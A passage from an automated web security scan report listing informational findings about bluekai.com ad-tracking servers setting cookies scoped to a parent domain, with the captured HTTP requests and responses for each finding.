Set-Cookie: bkc=KJh566N/sNWxOded1TZ4BSO/CSTWyudi50IYnxikJyX8H7JxHnaSFa4WvYgihP/ynu3W6J+KCcbxAp6DvQUhbvkD6/+Va//Ru0W3aVzu72ZjyIf0t8k8qlq4K2W0/mAR2cqzC9oQWYU4aCgL+BIWFwOAwEROTKjmbSO030w5f8UtxwggecOBBFHINQ5A/LYJ0TBKbUbUrUfe04PgFSbz7GHySkMS3zbfASTKb3402YGDHBMcfiFBI2Gwewyt3YnlR5Iy/XoC07KqIfUZXznlTpDCkjtwT2j78HH4BXizU2abOnnKVG/y8N+FD2m47yeqjmb4dDZjXb6lSK8AWQCzd3wbflftX6Popg4IUyEDMy/FUIU3tUUv7sd+Gdg5EVYwb3NdvAX7o1KP8IwuiEUoThUoAyduOX3dksFKuNzGk0+fkS1hbE4FoB1n6AIgowkdVUXCfd0Q1IP0UnZtUogggRmwQvPOQNxbf2Km2vQ0NNLw6KlMVIeGQ+zfjT8qa8z9CfxdVL8pIKp8YKA8jSblU3UefMXtSv68KlYozk+9Iid+nfzFk5wvDXIAi8Dpl5/U07IDRNlu0XgX45Rk+Of4ScXI57kAx4ga7exdgxB67i1BHMMPvm1X7dD57/5x0Q==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0ETtBQVv7dt8KHGRZeQzWE0sJiZ1QBR6NiQXM01YQeVz4NxmomzXaRmTxCnYRsPPT/u8eOZhzZoQ8kXEwWYAJRp9h7ruWLaGjy5QSsPwk4xaB6QvqXKwzE0YGW3gFTburxozz1RUW019ea+1Oi5TeZbziXOm3BWTvyZOQuGVvLewk9X8C4w9K3uIOCR/CfXQhGZhSz5RA4yQnShQ+MuxJ2difTakOVaLQvtcQ5Se/90+Hc0y==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhBMfNn96Wxhqz/vYqOxgOHh1JtpzhIqhkiYWHmYxGZ85lrcSQx+RQOSl+fKyLg65G34TsBVao3mi+Oqj0nMPLBFlkFl+LvKNhQ2YRwn6ZaEVMKRvf/5YfEyJN1JPzCoBpaNcJqiapklCMkQgQF2DIA7tmMT4cyjepXlFyC2WaGiE7kMjjQoO5SY365Z1cPvb6U3dXz+TluAPHnCNxsx91S2W/bJHahdFtBNo4PLomvWVyVc1I2pEiiYNpswcYqrS9eJPaSRdScs2vFLaSpF54Kt5XNVyK2Nk77/G8wm6UGcslc8FVLunltk0o9GHjvYbYtWoprpSbLNHZg1UzKeAK2q+nF5y4n3NwipXEUsxG71ILaG9xWQ9puiO9/ON1/jKol8RNoFVyKFDZ+Dpklco9gslwrRbuoXJisEvJsoEbdAkd2UtPj; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhNkW+GWNWDCFdJVJF1NagO+ZJWPs0kSDJi6+QRL/taELL6yuyW5Vm+iUUkYhEWveT3bk/WGNZTYiSYrOYki/CrHnGDacsgN/VQSaUWP4uzrPwrRsTemjw15XT2gl2Z3QK9FTT8rQpiRMIQGVusQ6eHxpvTfJvIsB9/6utMMGRs5mv9huHQwn6ahOtFvFiMTz6QthjMlRld0PLwZxXe/TWb2+BoZdWferCrOuJq0xpaPa8zpzBpu8acxxtw/bJmQ0bMKOKU5SSM/GjfsXSnJBYi0Y7mat5abwXkioMH9Hw2ujsaF5uW/2PAb51TXT3W568clEZ2F9IXcbOqaOmZw7+hmYPMgixaTVTuIJSumfpZ/VaX2zE1Wgs/FsTkOyh+a0ERe4uAKeRP2w39BC0pQVDGb2dJGbpdzSydpES0UAm4bXrpfX/oXFUHCc5KGemBTQhxucwIY7THf6O6ZnmD2RPoTJYcg1HVkdyQzLHetMciWL88lWBVRj2n4kn1Yx2jME6rTjgwKAQ7hklY4EpR/KK8eHIc8BurjGeoBUDD7HNXpLi2lHpkFPEhp1K55rPAqxPnv/gpg1PpuIoeEPQ4SLJ8Uk7itU+i6QD7nP7qfJMRtlVvtREJ1qAldpC2t0omqxZqbbhCndNKfZoJpBtto4/c6s3g7fjZgXVSNRHg7oGxBVzGGRssnqVtm0+imgjy+kCV7qwjSps7Z7emFNZCwIfEh/zLtfnI0PaoLtnwmJS7/JxZ+YmDUBSBKqq+jw18f3uveEogwIgjXM6ZVLtoCBuxWtXDNFF8USJslL+sEmEasTUlDMvdcsufzJg+lueUUiBftTNQdRDyZP5wo5kgzuo3ykm8T8Y3LbBraJ0E9TqszFzXZdX9GjnTrx==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 10:42:49 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 649
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BK12329&t=2&rnd=471567808" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmana
...[SNIP]...

10.279. http://tags.bluekai.com/site/3561 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3561

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=uj+KPIHxKdVd8JkA; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
bkc=KJh56pN/xkWDOdedu0mP4aOWxTAWk5eU6OJDWWHEQbwCDWuxWr6N29av+OCOcNxQ6+RAPmODx89W65QDeqU6xRv/sGWvx4KGBpN7K442mm4w8qNfqLAW8oTB+c6PFuRYvY7fCU6m112SSdR9ZBQWVrLXTIetPKtLZFnSvSK37hAGj/oKYbqnFG39Z43NAyjy6xWAk5PgtK4YNvX5PlL7WG9fdIB+y/NJc+dZo7f+l0SQJyC1Ouo8zgzy2VLl3FheccCDKK6fTR6R2fJym1G5mIaIwInIwmHIWUTu5CNy+yQfCSlYbdFzvfFzrulrTEjrIkdSkXgl+6Od7SwYUElzkB4rSyRiXyqurj3UmgZeyoEUUkYw6hlQnDF7UEcP+VNtTaUBh6YZ6AXmglvcCYZF4VyOpczeQbfDFhlYxtfrqpP42zTn8TEUhgC+yGPHf3pyCdeIYwKK1ct4+kt5hfVSpdRbnt8hETSTS5Pt3dFLfpVR6h8Kodt6dyY8NCcX; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
bkst=KJykMgNnx6Wxhv2//uSFWZyDLq92lnlwwShYe/c/DTvYuUk4efEuxQPgKl+fS2WbP4TcLqED5BjVlG+qnEweqbqe8rrLlmn+GIbyH47lsePOjIAMJIAkPpabELkqqCrHPUqsv/gi+zldkwys/IV1kZYAWNGvgx71fwsptcVl+SD09OgxGOmukWEW+KIFRM26tpSPW+QxiV5796KA0sUvA5+9DzKYnKM2Nqg7A+2iQdfy5cCX5Z/mp0Keb2a2rgLSBUa6KjEbEbFV3F44vAYCaAGnvB1AAJbLveLPRpNs+dcijMvro2whqcBfV4ElGrX0aYue5xJx9QJ99JXxRosMSRx0NDFnVaq+Xru1+bx0Jy4/kDtjr8EvNpM61DMD39fRqd6cDBNRLx==; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3561?id=d96a784e-8901-47de-9dd1-4f91acb31514&redir=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227124764&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101qbH2+1Uv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6Bnxh9iQWlEOWs; bklc=4df9e812; bko=KJpEWVjQIwcro0XMxbWQ9XwaENIOgOlY1JRK1TEa0z99kBDYib701MeG0np6aVYT9tVh11xJxPC1e/kx1PSs4cRsOrRUpTWbFckCncDGiT1CPCeYRZvRh9jCzEsz8VjQIwfXruXpy6xGi8WCQRKO/KfJ1bYRaohNiHdYRZExTRVhJwARsBTalynv0QJj9HrF9N6a9n5swPx=; bkst=KJykMgNnx6Wxhv2//uSFWZyDLq92lnlwFEnWW/QXJuiRkw4NxYL+PnYt+fKla3t+XMI/oSVZWDF+FOKlVZSsl60cFS00zFw7+fge8rU4R5xW7SVw7vuUU1UGmuPFrVNWP+AjG0ivopqdU4JgMJxpVGvHEZQo+YRyLfFlR+45Noqv9sC9Q68/DC/HPpTdi7lqq5+DuZOeJJb5eH0H/ozoHtTeHH6n+3OlkILKu7bee4geGIcOXScjm8A1nARlb4oXN1EHtUf3l02q328d3yYaViQ+GW0Exc30oshPMwDRUzUE0XZT7AfcLdUBH5a4iffBDJ91NQk9YxQ99UhYiWVmoCcvP/X+RNsN081plonv7OyQPpjkfk/3UIwxh0OHGdg8I3ld9aSjVkL=; bkw5=KJh+AE+n96WDCqd5P5iL1DqxSYaiG0/iyPMTS/yO/DMW5soMA8MmPtWMaGvaFjO9Y3LaW4ynkCqtIQzWnKhXaUjbfXb9/pQyCtsIm2hfpCxZyuBskX42gso7BcxmCEdAyuc510fj+KEtsAq7GJH31IjeZg6Pbv9PF1TMIoPGrv9bBKyhRVrlw1ChvnDI3VMoOBcbv5uAWrs4ygwAafPnvlCgynjeKoit8al/MA10kYpH7FLmbVUEAQ28zIYxw+R+6jZwc5JwtHnNzPSWhZYqKon9u2sxj0cBjD6k8LjUwf7Ply7YLrh6m0c4aKB2xX85wajDp4Fd6MovPJ6qktjrAt/giJ8D1bJPbDRR1hJGf7Z728Duf8nLrBTNWtv0FkMEuVnrosY9VCDY/jTS5dfiO8HuVoG=; bk=mru6EmHxKdVd8JkA; bkc=KJh566XGQlWROdeF0hjq+3nkQJR0vdXmnGHuz+bH5i9ok+y8IaBqzoZDwbcVz7BSGjyTvaJ05J/ea0mg+qjJqDo87+qwlrK8dc82KofFII+24XXqOeYbeMH2kABmeYJ/77HnE0CwmSgIXxnEphjXBGKPmVXl8T6pc334VYMk0isn7LtIMWmRITNFSEkgG5lZDtUrB6fHtHzUQndTcSgO+jz2Li7BdzSd5D9Q9GpwPdnLeZUrBljudiWawanKIW88nuZ23OhnuYKwoB1c6Cdf6idvEXo+K2vB0C8kCdn3gFEu+7HCxfg4JXl40diz4cXe5BrzDsTwucwKrvLOi12R0OS3UZiPMiCpl7iVkr1+TYlw2N6hNTlgUz9gpD5wg+nwMiNnH8D8qlhRYlMEa7gq1F2tvd48oq2GFryrvCKDPTSkb8Pnx2J88U4klxcocVPIwt1UlzzPpVKppU1q6ZBHS5bBd4xdCpL+TVhxNFAXTpI/f92k; bkdc=res

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:08:11 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 17 Jun 2011 13:08:11 GMT
Cache-Control: max-age=86400, private
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=21&external_user_id=b1G%2BE4z9999C5%2BOB&_m=1
Set-Cookie: bk=uj+KPIHxKdVd8JkA; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56pN/xkWDOdedu0mP4aOWxTAWk5eU6OJDWWHEQbwCDWuxWr6N29av+OCOcNxQ6+RAPmODx89W65QDeqU6xRv/sGWvx4KGBpN7K442mm4w8qNfqLAW8oTB+c6PFuRYvY7fCU6m112SSdR9ZBQWVrLXTIetPKtLZFnSvSK37hAGj/oKYbqnFG39Z43NAyjy6xWAk5PgtK4YNvX5PlL7WG9fdIB+y/NJc+dZo7f+l0SQJyC1Ouo8zgzy2VLl3FheccCDKK6fTR6R2fJym1G5mIaIwInIwmHIWUTu5CNy+yQfCSlYbdFzvfFzrulrTEjrIkdSkXgl+6Od7SwYUElzkB4rSyRiXyqurj3UmgZeyoEUUkYw6hlQnDF7UEcP+VNtTaUBh6YZ6AXmglvcCYZF4VyOpczeQbfDFhlYxtfrqpP42zTn8TEUhgC+yGPHf3pyCdeIYwKK1ct4+kt5hfVSpdRbnt8hETSTS5Pt3dFLfpVR6h8Kodt6dyY8NCcX; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJykMgNnx6Wxhv2//uSFWZyDLq92lnlwwShYe/c/DTvYuUk4efEuxQPgKl+fS2WbP4TcLqED5BjVlG+qnEweqbqe8rrLlmn+GIbyH47lsePOjIAMJIAkPpabELkqqCrHPUqsv/gi+zldkwys/IV1kZYAWNGvgx71fwsptcVl+SD09OgxGOmukWEW+KIFRM26tpSPW+QxiV5796KA0sUvA5+9DzKYnKM2Nqg7A+2iQdfy5cCX5Z/mp0Keb2a2rgLSBUa6KjEbEbFV3F44vAYCaAGnvB1AAJbLveLPRpNs+dcijMvro2whqcBfV4ElGrX0aYue5xJx9QJ99JXxRosMSRx0NDFnVaq+Xru1+bx0Jy4/kDtjr8EvNpM61DMD39fRqd6cDBNRLx==; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 17-Jun-2011 13:08:11 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 0
Content-Type: text/html

10.280. http://tags.bluekai.com/site/38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/38

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=/W5cGhrm2Ibd8JkA; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
bkc=KJh56pN/xkWDOdedv0mPa9oovJWQ6pbck3YY/JG5eRziQoJGgbWwuvEaYnvG/vv+uSM93RRQYSvhvHo30uHOH/N9CSOfNarKLfpf4opp8dnKwq5LOtj4eeQIupTFDiQgOTE2PMewZwf+9EYhYqxo20JEXquPtNIp+tqvSb5+378rGJQ+IHgQ3FQb9Zq3N6TRysDcAaOVghP4Yamd5Ap+cRXegLvl0+dS0KwqlBuFd511r/w9Ns/NEITVo7f+JoPdM9awv322nfhh0g6LcegCwMlZEC80oybTUTV4CjlflvlYBZsEXc3DKtVUmhdZc7jy6dduFkJIr9wbblyilmUZoghtUyLxZEmx042f3j1fvWh8fU7NmBLOl7B6lkPEU5+L95fD49hA3dlA6YglkMek+RXS9UFuyv9pdVKgXJYnI6FBPf6ny77C+EarLlOhkeL7dYWzcKcKWbqF6fSGXfCHX2kK8TDy2IxVBblSn7V49p6szXqebfu42iXEOOjA; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
bko=KJynjt5QuJUd8zF/GYw1yweMlDXQ3NYxQKciob29NQ8CsWrwsznijs990Z3OhPH8sHC6jafbYMezQqJRsmvW/YyZCAuGsY+ew+9m8C4wQE3XKVWL5uinQ0aVW1JiRoMWOZah1jpkjZeTdF08npweHYinAusOCTWCfLApGJQV7cVJcX/YroTUhonARtOTalynvYLnj9PLF986axYK2E2I; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
bkw5=KJh+AE+n96WDCqdB3ZhiMOW6VGMR3/C/1YkXB1S9WWnW5soMA8MmPtWMaGvaFjO9Y3ra/wQUnYlL2xX/V+M8vrp6lo6OHlOQeL+I5tqmwEzl9hTCrMpr8NVfWb1UAw+ecCpukl4J7iVlNpYh91PTZXARJBAFxhz+dlDH6S2/Q0UPtEswSPrffDss/bZBWDIL7YJSwTmSPYnXDliSfnvI6Fn4sgeMAcfZncAULrrxaWPn216eCy0yjzZc7ek60Y9qk3M7WTz1DqJWIpQFxsmAEENvTvPQ0nmx833ZW7/E6lT0SfXmQonLjeLiIqJV55iDfhbqGI7+rtJuD5nnR6UPlwh4MLKHbM7EFI7/8BF0W6I3v5s3IY9/s45N/k7cNjDug6BbuFXN/tvZznZrEAnrosYRVCPX/j8sTApoOddoUQT=; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/38?ret=js&data=all HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101qbH2+1Uv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6Bnxh9iQWlEOWs; bklc=4df9e812; bko=KJpEWVjQIwcro0XMxbWQ9XwaENIOgOlY1JRK1TEa0z99kBDYib701MeG0np6aVYT9tVh11xJxPC1e/kx1PSs4cRsOrRUpTWbFckCncDGiT1CPCeYRZvRh9jCzEsz8VjQIwfXruXpy6xGi8WCQRKO/KfJ1bYRaohNiHdYRZExTRVhJwARsBTalynv0QJj9HrF9N6a9n5swPx=; bkw5=KJh+AE+n96WDCqd5P5iL1DqxSYaiG0/iyPMTS/yO/DMW5soMA8MmPtWMaGvaFjO9Y3LaW4ynkCqtIQzWnKhXaUjbfXb9/pQyCtsIm2hfpCxZyuBskX42gso7BcxmCEdAyuc510fj+KEtsAq7GJH31IjeZg6Pbv9PF1TMIoPGrv9bBKyhRVrlw1ChvnDI3VMoOBcbv5uAWrs4ygwAafPnvlCgynjeKoit8al/MA10kYpH7FLmbVUEAQ28zIYxw+R+6jZwc5JwtHnNzPSWhZYqKon9u2sxj0cBjD6k8LjUwf7Ply7YLrh6m0c4aKB2xX85wajDp4Fd6MovPJ6qktjrAt/giJ8D1bJPbDRR1hJGf7Z728Duf8nLrBTNWtv0FkMEuVnrosY9VCDY/jTS5dfiO8HuVoG=; bkst=KJykMgNnx6Wxhv2//uSFWZyDLq92lnlwFEnWW/QXJuiRkw4NxYL+PnYt+fKla3NE8UXxu6+Bj0URKu2r+zy1F8AmZbIpzGFU2fgearU4R2xW7SVw7vuUU1UGmuPFrVNWP+AjG0ivkpqdU4/qMJxpVGvHEZQo+YRyLTKwR+45Noqv9sC9Q68/DC/HNfTIill4q5+DuZOeJJb5eH0H/ozoHtTeHH6n+3elPIrKu7bne4geAIcHbqW8mJL1gAjlb4j0N1EHhVc3wb8S328d3yYaViQ+GW0Exc30GrhDMwDRlzEpbXZT7AfcLXl+j5c4igfnDJ91NQk9YxQ99UhYiWVmoCcvP1X+RNZN081plonv7OyQPpjkfk/3UIwxh0OHGN/dFdD4Dbaj7y==; bk=S/ybpKHxKdVd8JkA; bkc=KJh56p2/xkWDOFeFkjavYGD6kWixs46qVG/vQZCtnO0vYW3iFRqIQY/+HoOaOuJ+ED/aEMDWuHYBE5axu0RJ/ZGWsQE5G2f67mV22IBXc84lf76K9a1fx157t5rwBepvzNqrtjG2BzIqbFbh9yLFOC0NwBA7EwNsDNXfRNwpzymkUB7qOa4aNtWyDNTfSxYUUDOuVENV4Ya1KKtTVMrH9apaq2Vd+j175fAogdlqYgM2y1hv+DdraSSX5GF3wXSOJ2UUFC4KM7sFYxKMlnaEf+xh5d3/INUTV5C80B6rqO1tYV2arB4lrxLCfkWcBl6FfuFkCp+QL1aHTHTlBdVNO239XvvOqvcrNV8rFpeN+j4D8VywK1dE4k5BzttpOUCE8t1GPXtEQhFz9Vc3S8X69dSDQVa78+2VTHWU28zbUT6rYCKWB0KTpzvkzKbXX/5yj/pfxJMKE2ri2rBs7zdmOiIcrvzelcEU537dt5571sz24WfgS4XOj/RVu9==; bkdc=res

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:21:09 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Set-Cookie: bk=/W5cGhrm2Ibd8JkA; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56pN/xkWDOdedv0mPa9oovJWQ6pbck3YY/JG5eRziQoJGgbWwuvEaYnvG/vv+uSM93RRQYSvhvHo30uHOH/N9CSOfNarKLfpf4opp8dnKwq5LOtj4eeQIupTFDiQgOTE2PMewZwf+9EYhYqxo20JEXquPtNIp+tqvSb5+378rGJQ+IHgQ3FQb9Zq3N6TRysDcAaOVghP4Yamd5Ap+cRXegLvl0+dS0KwqlBuFd511r/w9Ns/NEITVo7f+JoPdM9awv322nfhh0g6LcegCwMlZEC80oybTUTV4CjlflvlYBZsEXc3DKtVUmhdZc7jy6dduFkJIr9wbblyilmUZoghtUyLxZEmx042f3j1fvWh8fU7NmBLOl7B6lkPEU5+L95fD49hA3dlA6YglkMek+RXS9UFuyv9pdVKgXJYnI6FBPf6ny77C+EarLlOhkeL7dYWzcKcKWbqF6fSGXfCHX2kK8TDy2IxVBblSn7V49p6szXqebfu42iXEOOjA; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynjt5QuJUd8zF/GYw1yweMlDXQ3NYxQKciob29NQ8CsWrwsznijs990Z3OhPH8sHC6jafbYMezQqJRsmvW/YyZCAuGsY+ew+9m8C4wQE3XKVWL5uinQ0aVW1JiRoMWOZah1jpkjZeTdF08npweHYinAusOCTWCfLApGJQV7cVJcX/YroTUhonARtOTalynvYLnj9PLF986axYK2E2I; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJh+AE+n96WDCqdB3ZhiMOW6VGMR3/C/1YkXB1S9WWnW5soMA8MmPtWMaGvaFjO9Y3ra/wQUnYlL2xX/V+M8vrp6lo6OHlOQeL+I5tqmwEzl9hTCrMpr8NVfWb1UAw+ecCpukl4J7iVlNpYh91PTZXARJBAFxhz+dlDH6S2/Q0UPtEswSPrffDss/bZBWDIL7YJSwTmSPYnXDliSfnvI6Fn4sgeMAcfZncAULrrxaWPn216eCy0yjzZc7ek60Y9qk3M7WTz1DqJWIpQFxsmAEENvTvPQ0nmx833ZW7/E6lT0SfXmQonLjeLiIqJV55iDfhbqGI7+rtJuD5nnR6UPlwh4MLKHbM7EFI7/8BF0W6I3v5s3IY9/s45N/k7cNjDug6BbuFXN/tvZznZrEAnrosYRVCPX/j8sTApoOddoUQT=; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 17-Jun-2011 15:21:09 GMT; path=/; domain=.bluekai.com
BK-Server: c5b
Content-Length: 190
Content-Type: text/javascript

var bk_results = {
"campaigns": [
{
"campaign": 18995,
"timestamp": 1308237669,
"categories": [
{
"categoryID": 26353,
"timestamp": 1307122732
}
]
}
]
};

10.281. http://tags.bluekai.com/site/3834 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3834

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=z+h8Pzt76vid8JkA; expires=Tue, 13-Dec-2011 11:25:08 GMT; path=/; domain=.bluekai.com
bkc=KJh56f2nxkWDOdeFv0B2oaO/ud//13a4x6+xxHeBMAjeWDaJ+B4xeNYAoHY03WYA4X9kzsL/Qi9SZbvCkiyvJchsDWnxmzMB5XfyfrwemPXrf2Npb0aQTzaYIm67qQsGAIKDWpSW8lNBhIijtQsbwJbNoHwv7ezrD3ND9opSPfyak0ct8vT62hFd+QwHJeYp6LipI8u8lfiBXg5aT/f0h+4vtyUoBKP6Ugoyvk6Ik7T2A78DFkKmcWolvQKP4zoqmK7NgnuqAHTBudwd1MT7lNyOQhf7kUrM6oylcrQ92CR+PB0ZPlrAAX3zBNbi8Vy4Kvf0KE415VBd9ciiIHMbSwup6hFuvVUms8I693s0CKc/If2+8HacIowZ0IrSL3rXmuc+PdTKkbT3F0M7h3xwkw7fM9B6cCz6726KntKAoNwudejtQ7EdI0lCuApVKEdMwydOXPQ=; expires=Tue, 13-Dec-2011 11:25:08 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3834 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bko=KJygasHQrwMo30XMyy8Cs/LOvvRaj3701MeG0np6aVYT9tVh11xJxPC1e/kx1PRswVS/UAbs4cRsOrRUpTabFUkCncDGiT1CPCeYRZvRh9jCzEsz8VjQIwfXruXpy6xGi8WCQRKO/KfJ1bYRaohNiHdYRZExTRVhJwARsBTalynv0QJj9HrF926c9JNqmKQ=; bkw5=KJh+Ae+n96WDCqd5P5iL1uoG+OYhDHYHRYhXB1S9WYHimgVhuDp73fYHa/vaFKeYakjqICzLnKpNeyCStwA3fwEK7xaczs9m92X5pMt7w96KvUGXfr5PrbwHY0Md/xXmbjNp0qTk+2zyLxePU1vAelAmN3YnmcC5Hwxg6lOJ5Vq1RXgmf7Cx8aCZ4UnH0iZigEBG0iEYwTUlDNoVkpCTSXmrxd3R+KH50J8eYkx+Dz2eCy0yqzZcdek00YYqkrMmcRz1DqBWz8hUGetu61GSKvARXipAzkPquq7hBD2hdUKeLYRl7tEArtb0qXZfCXKb3F7dUNL7ZVo0A2nLqP31QICJ+ueSWe4Ykwa9K0X8lkzqbo50JyweBOLxu1rKh71SdysJBNzw; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101qbH2+1Uv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6Bnxh9iQWlEOWs; bklc=4df9e812; bk=Xp1T61t76vid8JkA; bkc=KJh56gNn96WxO4OlsMWJJ3Y/MuW/hQmdYC+OODsLD0GVQQQShaTnw09CtYCYG3QxQF29sis5Cu9/RZkkoRNHa/nA/G/VQMLzSdvZrnlf14BRq75z9BmfxB4qE2/hlb888LwLmKUax11kD0rUQUM2v2ZY3bCTSGX+d5SdfD9iOz0rI7khFfn6VfKjda6Jre58bhFk7uJfUEkERO4wtJDE2rLhINc8xEkthm8DMiQckn4pf/Ne+o5kMlVp8q0LnThFgTsCJCKDIhJL0PLw5Qefuyb3ULBgFK0DLru+kXN04Q9XNIuI4DF5mCQY7LhXecdTdKn1JMr+nc7g6NRQV7WyW7Fd5NC8B1fIBwwPfn30ofyN0xT346IySXGF0Fkh5A8jdLXbjmfM6Lh7E8BULr0jBaFKNFW/LeeQAvLrNtDdbp28+KWW; bkdc=res

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:25:08 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 17 Jun 2011 11:25:08 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=z+h8Pzt76vid8JkA; expires=Tue, 13-Dec-2011 11:25:08 GMT; path=/; domain=.bluekai.com
